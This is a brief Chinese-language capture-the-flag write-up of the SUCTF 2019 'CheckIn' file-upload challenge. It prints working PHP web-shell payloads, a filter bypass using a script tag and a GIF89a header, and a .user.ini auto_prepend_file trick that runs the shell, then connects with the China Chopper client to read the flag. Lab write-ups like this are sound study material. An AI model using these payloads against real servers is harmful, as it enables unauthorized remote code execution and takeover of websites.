[SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn

上传一个一句话木马（<?php @eval($_POST['cmd']);?>）的php文件 

告诉我们不合法的后缀，说明不能上传php文件，修改后缀为jpg

发现过滤了<?，修改一句话木马内容（<script language='php'>eval($_POST['cmd']);</script>）

不是图片类型，伪造图片头（GIF89a<script language='php'>eval($_POST['cmd']);</script>）

上传成功并有回显，菜刀连接，还是不出意外的失败了 

这个题其实是.user.ini（PHP: .user.ini 文件 - Manual）类型的文件上传漏洞的题，还是跟.htaccess一样，先上传.user.ini，再上传一句话木马，先写.user.ini

GIF89a
auto_prepend_file=1.jpg

上传成功有回显，再上传1.jpg（GIF89a<script language='php'>eval($_POST['cmd']);</script>），1.jpg也是对应了上传的.user.ini的内容

回显了路径，菜刀连接（这里url地址最后要有/index.php）

进去之后也是发现了上传的.user.ini与1.jpg

根目录下发现flag